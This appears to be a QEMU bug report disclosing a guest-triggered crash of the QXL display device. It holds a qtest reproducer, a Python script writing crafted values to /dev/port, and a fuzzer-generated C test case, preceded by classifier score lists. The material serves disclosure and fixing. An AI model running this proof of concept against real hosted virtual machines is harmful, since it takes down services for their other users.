1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
|
risc-v: 0.971
user-level: 0.890
vnc: 0.879
KVM: 0.851
debug: 0.839
ppc: 0.834
TCG: 0.831
permissions: 0.831
performance: 0.826
network: 0.816
architecture: 0.813
hypervisor: 0.812
register: 0.805
graphic: 0.801
VMM: 0.800
mistranslation: 0.800
virtual: 0.798
assembly: 0.790
x86: 0.789
socket: 0.778
peripherals: 0.776
semantic: 0.770
arm: 0.769
kernel: 0.758
i386: 0.754
device: 0.745
PID: 0.738
files: 0.704
boot: 0.642
--------------------
virtual: 0.965
x86: 0.959
TCG: 0.959
device: 0.856
PID: 0.805
risc-v: 0.730
files: 0.441
VMM: 0.425
vnc: 0.377
debug: 0.147
ppc: 0.079
register: 0.050
socket: 0.031
KVM: 0.029
graphic: 0.029
kernel: 0.022
assembly: 0.022
network: 0.012
boot: 0.011
architecture: 0.011
user-level: 0.010
permissions: 0.010
performance: 0.010
semantic: 0.010
mistranslation: 0.009
hypervisor: 0.006
i386: 0.006
peripherals: 0.005
arm: 0.001
DoS via assert failure by guest user
Description of problem:
As root in guest VM user can execute special script, which crashes the whole VM with error
```plaintext
hw/display/qxl.c:1594 inside of function void qxl_set_mode(PCIQXLDevice *, unsigned int, int): Assertion `qxl_add_memslot(d, 0, devmem, QXL_SYNC) == 0` failed
```
Steps to reproduce:
1. This bug can be reproduced with:
```bash
cat << EOF | ./build/qemu-system-x86_64 -vga qxl -m 2048 -nodefaults -qtest stdio
outl 0xcf8 0x8000101c
outl 0xcfc 0xc000
outl 0xcf8 0x80001001
outl 0xcfc 0x01000000
outl 0xc006 0x00
EOF
```
2. Also, we can execute this python3 script inside guest VM as root (to invoke VM use command: **_qemu-system-x86_64 -vga qxl -hda debian.img -m 2048 -nodefaults_**):
```python
import os
f = os.open("/dev/port", os.O_RDWR|os.O_NDELAY)
l = os.lseek(f, 0xcf8, 0)
os.write(f, b'\x80\x00\x10\x1c')
l = os.lseek(f, 0xcfc, 0)
os.write(f, b'\xc0\x00')
l = os.lseek(f, 0xcf8, 0)
os.write(f, b'\x80\x00\x10\x01')
l = os.lseek(f, 0xcfc, 0)
os.write(f, b'\x01\x00\x00\x00')
l = os.lseek(f, 0xc006, 0)
os.write(f, b'\x00')
```
This script causes VM to crash.
[PoC_qxl-vga_crash.mkv](/uploads/7ee262c20dca69aa9417812f6a93a532/PoC_qxl-vga_crash.mkv)
Additional information:
This issue was found by fuzzing. Here is an auto-generated C source code for a test case that will reproduce the bug.
```plaintext
/*
* Autogenerated Fuzzer Test Case
*
* Copyright (c) 2023 Artem Nasonov <anasonov@astralinux.ru>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
* See the COPYING file in the top-level directory.
*/
#include "qemu/osdep.h"
#include "libqtest.h"
/*
* cat << EOF | qemu-system-x86_64 -vga qxl -hda \
* ~/Downloads/virtualdebian.img -m 2048 -nodefaults -qtest stdio
* outl 0xcf8 0x8000101c
* outl 0xcfc 0xc000
* outl 0xcf8 0x80001001
* outl 0xcfc 0x01000000
* outl 0xc006 0x00
* EOF
*/
static void test_qxl_set_mode(void)
{
QTestState *s = qtest_init("-vga qxl -m 2048 -nodefaults");
qtest_outl(s, 0xcf8, 0x8000101c);
qtest_outl(s, 0xcfc, 0xc000);
qtest_outl(s, 0xcf8, 0x80001001);
qtest_outl(s, 0xcfc, 0x01000000);
qtest_outl(s, 0xc006, 0x00);
qtest_quit(s);
}int main(int argc, char **argv)
{
const char *arch = qtest_get_arch();
g_test_init(&argc, &argv, NULL);
if (strcmp(arch, "x86_64") == 0) {
qtest_add_func("fuzz/test_qxl_set_mode",test_qxl_set_mode);
}
return g_test_run();
}
```
|